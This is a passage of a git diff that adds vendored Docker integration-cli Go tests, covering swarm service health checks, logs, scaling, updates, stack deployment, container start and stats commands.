swarm.TaskStateStarting) + + containerID := task.Status.ContainerStatus.ContainerID + + // wait for health check to work + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + out, _ := d.Cmd("inspect", "--format={{.State.Health.FailingStreak}}", containerID) + failingStreak, _ := strconv.Atoi(strings.TrimSpace(out)) + return failingStreak, nil + }, checker.GreaterThan, 0) + + // task should be blocked at starting status + task = d.getTask(c, task.ID) + c.Assert(task.Status.State, check.Equals, swarm.TaskStateStarting) + + // make it healthy + d.Cmd("exec", containerID, "touch", "/status") + + // Task should be at running status + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + task = d.getTask(c, task.ID) + return task.Status.State, nil + }, checker.Equals, swarm.TaskStateRunning) +} + +// start a service whose task is unhealthy at beginning +// its tasks should be blocked in starting stage, until health check is passed +func (s *DockerSwarmSuite) TestServiceHealthUpdate(c *check.C) { + testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows + + d := s.AddDaemon(c, true, true) + + // service started from this image won't pass health check + imageName := "testhealth" + _, _, err := d.buildImageWithOut(imageName, + `FROM busybox + HEALTHCHECK --interval=1s --timeout=1s --retries=1024\ + CMD cat /status`, + true) + c.Check(err, check.IsNil) + + serviceName := "healthServiceStart" + out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.getServiceTasks(c, id) + return tasks, nil + }, checker.HasLen, 1) + + task := tasks[0] + + // wait for task to start + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + task = d.getTask(c, task.ID) + return task.Status.State, nil + }, checker.Equals, swarm.TaskStateStarting) + + containerID := task.Status.ContainerStatus.ContainerID + + // wait for health check to work + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + out, _ := d.Cmd("inspect", "--format={{.State.Health.FailingStreak}}", containerID) + failingStreak, _ := strconv.Atoi(strings.TrimSpace(out)) + return failingStreak, nil + }, checker.GreaterThan, 0) + + // task should be blocked at starting status + task = d.getTask(c, task.ID) + c.Assert(task.Status.State, check.Equals, swarm.TaskStateStarting) + + // make it healthy + d.Cmd("exec", containerID, "touch", "/status") + // Task should be at running status + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + task = d.getTask(c, task.ID) + return task.Status.State, nil + }, checker.Equals, swarm.TaskStateRunning) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go new file mode 100644 index 0000000000..c2216543d7 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go @@ -0,0 +1,96 @@ +// +build !windows + +package main + +import ( + "bufio" + "fmt" + "io" + "os/exec" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +type logMessage struct { + err error + data []byte +} + +func (s *DockerSwarmSuite) TestServiceLogs(c *check.C) { + testRequires(c, ExperimentalDaemon) + + d := s.AddDaemon(c, true, true) + + // we have multiple services here for detecting the goroutine issue #28915 + services := map[string]string{ + "TestServiceLogs1": "hello1", + "TestServiceLogs2": "hello2", + } + + for name, message := range services { + out, err := d.Cmd("service", "create", "--name", name, "busybox", + "sh", "-c", fmt.Sprintf("echo %s; tail -f /dev/null", message)) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + } + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, + d.checkActiveContainerCount, checker.Equals, len(services)) + + for name, message := range services { + out, err := d.Cmd("service", "logs", name) + c.Assert(err, checker.IsNil) + c.Logf("log for %q: %q", name, out) + c.Assert(out, checker.Contains, message) + } +} + +func (s *DockerSwarmSuite) TestServiceLogsFollow(c *check.C) { + testRequires(c, ExperimentalDaemon) + + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsFollow" + + out, err := d.Cmd("service", "create", "--name", name, "busybox", "sh", "-c", "while true; do echo log test; sleep 0.1; done") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + args := []string{"service", "logs", "-f", name} + cmd := exec.Command(dockerBinary, d.prependHostArg(args)...) + r, w := io.Pipe() + cmd.Stdout = w + cmd.Stderr = w + c.Assert(cmd.Start(), checker.IsNil) + + // Make sure pipe is written to + ch := make(chan *logMessage) + done := make(chan struct{}) + go func() { + reader := bufio.NewReader(r) + for { + msg := &logMessage{} + msg.data, _, msg.err = reader.ReadLine() + select { + case ch <- msg: + case <-done: + return + } + } + }() + + for i := 0; i < 3; i++ { + msg := <-ch + c.Assert(msg.err, checker.IsNil) + c.Assert(string(msg.data), checker.Contains, "log test") + } + close(done) + + c.Assert(cmd.Process.Kill(), checker.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go new file mode 100644 index 0000000000..29cca2358d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go @@ -0,0 +1,57 @@ +// +build !windows + +package main + +import ( + "fmt" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestServiceScale(c *check.C) { + d := s.AddDaemon(c, true, true) + + service1Name := "TestService1" + service1Args := append([]string{"service", "create", "--name", service1Name, defaultSleepImage}, sleepCommandForDaemonPlatform()...) + + // global mode + service2Name := "TestService2" + service2Args := append([]string{"service", "create", "--name", service2Name, "--mode=global", defaultSleepImage}, sleepCommandForDaemonPlatform()...) + + // Create services + out, err := d.Cmd(service1Args...) + c.Assert(err, checker.IsNil) + + out, err = d.Cmd(service2Args...) + c.Assert(err, checker.IsNil) + + out, err = d.Cmd("service", "scale", "TestService1=2") + c.Assert(err, checker.IsNil) + + out, err = d.Cmd("service", "scale", "TestService1=foobar") + c.Assert(err, checker.NotNil) + + str := fmt.Sprintf("%s: invalid replicas value %s", service1Name, "foobar") + if !strings.Contains(out, str) { + c.Errorf("got: %s, expected has sub string: %s", out, str) + } + + out, err = d.Cmd("service", "scale", "TestService1=-1") + c.Assert(err, checker.NotNil) + + str = fmt.Sprintf("%s: invalid replicas value %s", service1Name, "-1") + if !strings.Contains(out, str) { + c.Errorf("got: %s, expected has sub string: %s", out, str) + } + + // TestService2 is a global mode + out, err = d.Cmd("service", "scale", "TestService2=2") + c.Assert(err, checker.NotNil) + + str = fmt.Sprintf("%s: scale can only be used with replicated mode\n", service2Name) + if out != str { + c.Errorf("got: %s, expected: %s", out, str) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go new file mode 100644 index 0000000000..837370ceeb --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go @@ -0,0 +1,130 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestServiceUpdatePort(c *check.C) { + d := s.AddDaemon(c, true, true) + + serviceName := "TestServiceUpdatePort" + serviceArgs := append([]string{"service", "create", "--name", serviceName, "-p", "8080:8081", defaultSleepImage}, sleepCommandForDaemonPlatform()...) + + // Create a service with a port mapping of 8080:8081. + out, err := d.Cmd(serviceArgs...) + c.Assert(err, checker.IsNil) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + // Update the service: changed the port mapping from 8080:8081 to 8082:8083. + _, err = d.Cmd("service", "update", "--publish-add", "8082:8083", "--publish-rm", "8081", serviceName) + c.Assert(err, checker.IsNil) + + // Inspect the service and verify port mapping + expected := []swarm.PortConfig{ + { + Protocol: "tcp", + PublishedPort: 8082, + TargetPort: 8083, + PublishMode: "ingress", + }, + } + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.EndpointSpec.Ports }}", serviceName) + c.Assert(err, checker.IsNil) + + var portConfig []swarm.PortConfig + if err := json.Unmarshal([]byte(out), &portConfig); err != nil { + c.Fatalf("invalid JSON in inspect result: %v (%s)", err, out) + } + c.Assert(portConfig, checker.DeepEquals, expected) +} + +func (s *DockerSwarmSuite) TestServiceUpdateLabel(c *check.C) { + d := s.AddDaemon(c, true, true) + out, err := d.Cmd("service", "create", "--name=test", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + service := d.getService(c, "test") + c.Assert(service.Spec.Labels, checker.HasLen, 0) + + // add label to empty set + out, err = d.Cmd("service", "update", "test", "--label-add", "foo=bar") + c.Assert(err, checker.IsNil, check.Commentf(out)) + service = d.getService(c, "test") + c.Assert(service.Spec.Labels, checker.HasLen, 1) + c.Assert(service.Spec.Labels["foo"], checker.Equals, "bar") + + // add label to non-empty set + out, err = d.Cmd("service", "update", "test", "--label-add", "foo2=bar") + c.Assert(err, checker.IsNil, check.Commentf(out)) + service = d.getService(c, "test") + c.Assert(service.Spec.Labels, checker.HasLen, 2) + c.Assert(service.Spec.Labels["foo2"], checker.Equals, "bar") + + out, err = d.Cmd("service", "update", "test", "--label-rm", "foo2") + c.Assert(err, checker.IsNil, check.Commentf(out)) + service = d.getService(c, "test") + c.Assert(service.Spec.Labels, checker.HasLen, 1) + c.Assert(service.Spec.Labels["foo2"], checker.Equals, "") + + out, err = d.Cmd("service", "update", "test", "--label-rm", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + service = d.getService(c, "test") + c.Assert(service.Spec.Labels, checker.HasLen, 0) + c.Assert(service.Spec.Labels["foo"], checker.Equals, "") + + // now make sure we can add again + out, err = d.Cmd("service", "update", "test", "--label-add", "foo=bar") + c.Assert(err, checker.IsNil, check.Commentf(out)) + service = d.getService(c, "test") + c.Assert(service.Spec.Labels, checker.HasLen, 1) + c.Assert(service.Spec.Labels["foo"], checker.Equals, "bar") +} + +func (s *DockerSwarmSuite) TestServiceUpdateSecrets(c *check.C) { + d := s.AddDaemon(c, true, true) + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + testTarget := "testing" + serviceName := "test" + + out, err := d.Cmd("service", "create", "--name", serviceName, "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // add secret + out, err = d.cmdRetryOutOfSequence("service", "update", "test", "--secret-add", fmt.Sprintf("source=%s,target=%s", testName, testTarget)) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.SecretReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 1) + + c.Assert(refs[0].SecretName, checker.Equals, testName) + c.Assert(refs[0].File, checker.Not(checker.IsNil)) + c.Assert(refs[0].File.Name, checker.Equals, testTarget) + + // remove + out, err = d.cmdRetryOutOfSequence("service", "update", "test", "--secret-rm", testName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) + c.Assert(err, checker.IsNil) + + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 0) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go new file mode 100644 index 0000000000..fb896d52d5 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go @@ -0,0 +1,44 @@ +package main + +import ( + "fmt" + "io/ioutil" + "log" + "net/http" + "net/http/httptest" + "net/url" + "os/exec" + "strings" + + "github.com/go-check/check" +) + +func (s *DockerSuite) TestClientSetsTLSServerName(c *check.C) { + c.Skip("Flakey test") + // there may be more than one hit to the server for each registry request + serverNameReceived := []string{} + var serverName string + + virtualHostServer := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + serverNameReceived = append(serverNameReceived, r.TLS.ServerName) + })) + defer virtualHostServer.Close() + // discard TLS handshake errors written by default to os.Stderr + virtualHostServer.Config.ErrorLog = log.New(ioutil.Discard, "", 0) + + u, err := url.Parse(virtualHostServer.URL) + c.Assert(err, check.IsNil) + hostPort := u.Host + serverName = strings.Split(hostPort, ":")[0] + + repoName := fmt.Sprintf("%v/dockercli/image:latest", hostPort) + cmd := exec.Command(dockerBinary, "pull", repoName) + cmd.Run() + + // check that the fake server was hit at least once + c.Assert(len(serverNameReceived) > 0, check.Equals, true) + // check that for each hit the right server name was received + for _, item := range serverNameReceived { + c.Check(item, check.Equals, serverName) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go new file mode 100644 index 0000000000..fd9b15449d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go @@ -0,0 +1,186 @@ +package main + +import ( + "encoding/json" + "io/ioutil" + "os" + "sort" + "strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestStackRemoveUnknown(c *check.C) { + d := s.AddDaemon(c, true, true) + + stackArgs := append([]string{"stack", "remove", "UNKNOWN_STACK"}) + + out, err := d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil) + c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n") +} + +func (s *DockerSwarmSuite) TestStackPSUnknown(c *check.C) { + d := s.AddDaemon(c, true, true) + + stackArgs := append([]string{"stack", "ps", "UNKNOWN_STACK"}) + + out, err := d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil) + c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n") +} + +func (s *DockerSwarmSuite) TestStackServicesUnknown(c *check.C) { + d := s.AddDaemon(c, true, true) + + stackArgs := append([]string{"stack", "services", "UNKNOWN_STACK"}) + + out, err := d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil) + c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n") +} + +func (s *DockerSwarmSuite) TestStackDeployComposeFile(c *check.C) { + d := s.AddDaemon(c, true, true) + + testStackName := "testdeploy" + stackArgs := []string{ + "stack", "deploy", + "--compose-file", "fixtures/deploy/default.yaml", + testStackName, + } + out, err := d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("stack", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, check.Equals, "NAME SERVICES\n"+"testdeploy 2\n") + + out, err = d.Cmd("stack", "rm", testStackName) + c.Assert(err, checker.IsNil) + out, err = d.Cmd("stack", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, check.Equals, "NAME SERVICES\n") +} + +func (s *DockerSwarmSuite) TestStackDeployWithSecretsTwice(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("secret", "create", "outside", "fixtures/secrets/default") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + testStackName := "testdeploy" + stackArgs := []string{ + "stack", "deploy", + "--compose-file", "fixtures/deploy/secrets.yaml", + testStackName, + } + out, err = d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", "testdeploy_web") + c.Assert(err, checker.IsNil) + + var refs []swarm.SecretReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 3) + + sort.Sort(sortSecrets(refs)) + c.Assert(refs[0].SecretName, checker.Equals, "outside") + c.Assert(refs[1].SecretName, checker.Equals, "testdeploy_special") + c.Assert(refs[1].File.Name, checker.Equals, "special") + c.Assert(refs[2].SecretName, checker.Equals, "testdeploy_super") + c.Assert(refs[2].File.Name, checker.Equals, "foo.txt") + c.Assert(refs[2].File.Mode, checker.Equals, os.FileMode(0400)) + + // Deploy again to ensure there are no errors when secret hasn't changed + out, err = d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestStackRemove(c *check.C) { + d := s.AddDaemon(c, true, true) + + stackName := "testdeploy" + stackArgs := []string{ + "stack", "deploy", + "--compose-file", "fixtures/deploy/remove.yaml", + stackName, + } + out, err := d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("stack", "ps", stackName) + c.Assert(err, checker.IsNil) + c.Assert(strings.Split(strings.TrimSpace(out), "\n"), checker.HasLen, 2) + + out, err = d.Cmd("stack", "rm", stackName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Removing service testdeploy_web") + c.Assert(out, checker.Contains, "Removing network testdeploy_default") + c.Assert(out, checker.Contains, "Removing secret testdeploy_special") +} + +type sortSecrets []swarm.SecretReference + +func (s sortSecrets) Len() int { return len(s) } +func (s sortSecrets) Swap(i, j int) { s[i], s[j] = s[j], s[i] } +func (s sortSecrets) Less(i, j int) bool { return s[i].SecretName < s[j].SecretName } + +// testDAB is the DAB JSON used for testing. +// TODO: Use template/text and substitute "Image" with the result of +// `docker inspect --format '{{index .RepoDigests 0}}' busybox:latest` +const testDAB = `{ + "Version": "0.1", + "Services": { + "srv1": { + "Image": "busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0", + "Command": ["top"] + }, + "srv2": { + "Image": "busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0", + "Command": ["tail"], + "Args": ["-f", "/dev/null"] + } + } +}` + +func (s *DockerSwarmSuite) TestStackDeployWithDAB(c *check.C) { + testRequires(c, ExperimentalDaemon) + // setup + testStackName := "test" + testDABFileName := testStackName + ".dab" + defer os.RemoveAll(testDABFileName) + err := ioutil.WriteFile(testDABFileName, []byte(testDAB), 0444) + c.Assert(err, checker.IsNil) + d := s.AddDaemon(c, true, true) + // deploy + stackArgs := []string{ + "stack", "deploy", + "--bundle-file", testDABFileName, + testStackName, + } + out, err := d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Loading bundle from test.dab\n") + c.Assert(out, checker.Contains, "Creating service test_srv1\n") + c.Assert(out, checker.Contains, "Creating service test_srv2\n") + // ls + stackArgs = []string{"stack", "ls"} + out, err = d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil) + c.Assert(out, check.Equals, "NAME SERVICES\n"+"test 2\n") + // rm + stackArgs = []string{"stack", "rm", testStackName} + out, err = d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Removing service test_srv1\n") + c.Assert(out, checker.Contains, "Removing service test_srv2\n") + // ls (empty) + stackArgs = []string{"stack", "ls"} + out, err = d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil) + c.Assert(out, check.Equals, "NAME SERVICES\n") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go new file mode 100644 index 0000000000..b1cea35872 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go @@ -0,0 +1,199 @@ +package main + +import ( + "fmt" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// Regression test for https://github.com/docker/docker/issues/7843 +func (s *DockerSuite) TestStartAttachReturnsOnError(c *check.C) { + // Windows does not support link + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name", "test", "busybox") + + // Expect this to fail because the above container is stopped, this is what we want + out, _, err := dockerCmdWithError("run", "--name", "test2", "--link", "test:test", "busybox") + // err shouldn't be nil because container test2 try to link to stopped container + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + + ch := make(chan error) + go func() { + // Attempt to start attached to the container that won't start + // This should return an error immediately since the container can't be started + if out, _, err := dockerCmdWithError("start", "-a", "test2"); err == nil { + ch <- fmt.Errorf("Expected error but got none:\n%s", out) + } + close(ch) + }() + + select { + case err := <-ch: + c.Assert(err, check.IsNil) + case <-time.After(5 * time.Second): + c.Fatalf("Attach did not exit properly") + } +} + +// gh#8555: Exit code should be passed through when using start -a +func (s *DockerSuite) TestStartAttachCorrectExitCode(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _, _ := dockerCmdWithStdoutStderr(c, "run", "-d", "busybox", "sh", "-c", "sleep 2; exit 1") + out = strings.TrimSpace(out) + + // make sure the container has exited before trying the "start -a" + dockerCmd(c, "wait", out) + + startOut, exitCode, err := dockerCmdWithError("start", "-a", out) + // start command should fail + c.Assert(err, checker.NotNil, check.Commentf("startOut: %s", startOut)) + // start -a did not respond with proper exit code + c.Assert(exitCode, checker.Equals, 1, check.Commentf("startOut: %s", startOut)) + +} + +func (s *DockerSuite) TestStartAttachSilent(c *check.C) { + name := "teststartattachcorrectexitcode" + dockerCmd(c, "run", "--name", name, "busybox", "echo", "test") + + // make sure the container has exited before trying the "start -a" + dockerCmd(c, "wait", name) + + startOut, _ := dockerCmd(c, "start", "-a", name) + // start -a produced unexpected output + c.Assert(startOut, checker.Equals, "test\n") +} + +func (s *DockerSuite) TestStartRecordError(c *check.C) { + // TODO Windows CI: Requires further porting work. Should be possible. + testRequires(c, DaemonIsLinux) + // when container runs successfully, we should not have state.Error + dockerCmd(c, "run", "-d", "-p", "9999:9999", "--name", "test", "busybox", "top") + stateErr := inspectField(c, "test", "State.Error") + // Expected to not have state error + c.Assert(stateErr, checker.Equals, "") + + // Expect this to fail and records error because of ports conflict + out, _, err := dockerCmdWithError("run", "-d", "--name", "test2", "-p", "9999:9999", "busybox", "top") + // err shouldn't be nil because docker run will fail + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + + stateErr = inspectField(c, "test2", "State.Error") + c.Assert(stateErr, checker.Contains, "port is already allocated") + + // Expect the conflict to be resolved when we stop the initial container + dockerCmd(c, "stop", "test") + dockerCmd(c, "start", "test2") + stateErr = inspectField(c, "test2", "State.Error") + // Expected to not have state error but got one + c.Assert(stateErr, checker.Equals, "") +} + +func (s *DockerSuite) TestStartPausedContainer(c *check.C) { + // Windows does not support pausing containers + testRequires(c, IsPausable) + defer unpauseAllContainers() + + runSleepingContainer(c, "-d", "--name", "testing") + + dockerCmd(c, "pause", "testing") + + out, _, err := dockerCmdWithError("start", "testing") + // an error should have been shown that you cannot start paused container + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + // an error should have been shown that you cannot start paused container + c.Assert(out, checker.Contains, "Cannot start a paused container, try unpause instead.") +} + +func (s *DockerSuite) TestStartMultipleContainers(c *check.C) { + // Windows does not support --link + testRequires(c, DaemonIsLinux) + // run a container named 'parent' and create two container link to `parent` + dockerCmd(c, "run", "-d", "--name", "parent", "busybox", "top") + + for _, container := range []string{"child_first", "child_second"} { + dockerCmd(c, "create", "--name", container, "--link", "parent:parent", "busybox", "top") + } + + // stop 'parent' container + dockerCmd(c, "stop", "parent") + + out := inspectField(c, "parent", "State.Running") + // Container should be stopped + c.Assert(out, checker.Equals, "false") + + // start all the three containers, container `child_first` start first which should be failed + // container 'parent' start second and then start container 'child_second' + expOut := "Cannot link to a non running container" + expErr := "failed to start containers: [child_first]" + out, _, err := dockerCmdWithError("start", "child_first", "parent", "child_second") + // err shouldn't be nil because start will fail + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + // output does not correspond to what was expected + if !(strings.Contains(out, expOut) || strings.Contains(err.Error(), expErr)) { + c.Fatalf("Expected out: %v with err: %v but got out: %v with err: %v", expOut, expErr, out, err) + } + + for container, expected := range map[string]string{"parent": "true", "child_first": "false", "child_second": "true"} { + out := inspectField(c, container, "State.Running") + // Container running state wrong + c.Assert(out, checker.Equals, expected) + } +} + +func (s *DockerSuite) TestStartAttachMultipleContainers(c *check.C) { + // run multiple containers to test + for _, container := range []string{"test1", "test2", "test3"} { + runSleepingContainer(c, "--name", container) + } + + // stop all the containers + for _, container := range []string{"test1", "test2", "test3"} { + dockerCmd(c, "stop", container) + } + + // test start and attach multiple containers at once, expected error + for _, option := range []string{"-a", "-i", "-ai"} { + out, _, err := dockerCmdWithError("start", option, "test1", "test2", "test3") + // err shouldn't be nil because start will fail + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + // output does not correspond to what was expected + c.Assert(out, checker.Contains, "You cannot start and attach multiple containers at once.") + } + + // confirm the state of all the containers be stopped + for container, expected := range map[string]string{"test1": "false", "test2": "false", "test3": "false"} { + out := inspectField(c, container, "State.Running") + // Container running state wrong + c.Assert(out, checker.Equals, expected) + } +} + +// Test case for #23716 +func (s *DockerSuite) TestStartAttachWithRename(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "create", "-t", "--name", "before", "busybox") + go func() { + c.Assert(waitRun("before"), checker.IsNil) + dockerCmd(c, "rename", "before", "after") + dockerCmd(c, "stop", "--time=2", "after") + }() + _, stderr, _, _ := runCommandWithStdoutStderr(exec.Command(dockerBinary, "start", "-a", "before")) + c.Assert(stderr, checker.Not(checker.Contains), "No such container") +} + +func (s *DockerSuite) TestStartReturnCorrectExitCode(c *check.C) { + dockerCmd(c, "create", "--restart=on-failure:2", "--name", "withRestart", "busybox", "sh", "-c", "exit 11") + dockerCmd(c, "create", "--rm", "--name", "withRm", "busybox", "sh", "-c", "exit 12") + + _, exitCode, err := dockerCmdWithError("start", "-a", "withRestart") + c.Assert(err, checker.NotNil) + c.Assert(exitCode, checker.Equals, 11) + _, exitCode, err = dockerCmdWithError("start", "-a", "withRm") + c.Assert(err, checker.NotNil) + c.Assert(exitCode, checker.Equals, 12) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go new file mode 100644 index 0000000000..5cb1a3ea02 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go @@ -0,0 +1,159 @@ +package main + +import ( + "bufio" + "os/exec" + "regexp" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestStatsNoStream(c *check.C) { + // Windows does not support stats + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + statsCmd := exec.Command(dockerBinary, "stats", "--no-stream", id) + type output struct { + out []byte + err error + } + + ch := make(chan output) + go func() { + out, err := statsCmd.Output() + ch <- output{out, err} + }() + + select { + case outerr := <-ch: + c.Assert(outerr.err, checker.IsNil, check.Commentf("Error running stats: %v", outerr.err)) + c.Assert(string(outerr.out), checker.Contains, id) //running container wasn't present in output + case <-time.After(3 * time.Second): + statsCmd.Process.Kill() + c.Fatalf("stats did not return immediately when not streaming") + } +} + +func (s *DockerSuite) TestStatsContainerNotFound(c *check.C) { + // Windows does not support stats + testRequires(c, DaemonIsLinux) + + out, _, err := dockerCmdWithError("stats", "notfound") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "No such container: notfound", check.Commentf("Expected to fail on not found container stats, got %q instead", out)) + + out, _, err = dockerCmdWithError("stats", "--no-stream", "notfound") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "No such container: notfound", check.Commentf("Expected to fail on not found container stats with --no-stream, got %q instead", out)) +} + +func (s *DockerSuite) TestStatsAllRunningNoStream(c *check.C) { + // Windows does not support stats + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + id1 := strings.TrimSpace(out)[:12] + c.Assert(waitRun(id1), check.IsNil) + out, _ = dockerCmd(c, "run", "-d", "busybox", "top") + id2 := strings.TrimSpace(out)[:12] + c.Assert(waitRun(id2), check.IsNil) + out, _ = dockerCmd(c, "run", "-d", "busybox", "top") + id3 := strings.TrimSpace(out)[:12] + c.Assert(waitRun(id3), check.IsNil) + dockerCmd(c, "stop", id3) + + out, _ = dockerCmd(c, "stats", "--no-stream") + if !strings.Contains(out, id1) || !strings.Contains(out, id2) { + c.Fatalf("Expected stats output to contain both %s and %s, got %s", id1, id2, out) + } + if strings.Contains(out, id3) { + c.Fatalf("Did not expect %s in stats, got %s", id3, out) + } + + // check output contains real data, but not all zeros + reg, _ := regexp.Compile("[1-9]+") + // split output with "\n", outLines[1] is id2's output + // outLines[2] is id1's output + outLines := strings.Split(out, "\n") + // check stat result of id2 contains real data + realData := reg.Find([]byte(outLines[1][12:])) + c.Assert(realData, checker.NotNil, check.Commentf("stat result are empty: %s", out)) + // check stat result of id1 contains real data + realData = reg.Find([]byte(outLines[2][12:])) + c.Assert(realData, checker.NotNil, check.Commentf("stat result are empty: %s", out)) +} + +func (s *DockerSuite) TestStatsAllNoStream(c *check.C) { + // Windows does not support stats + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", 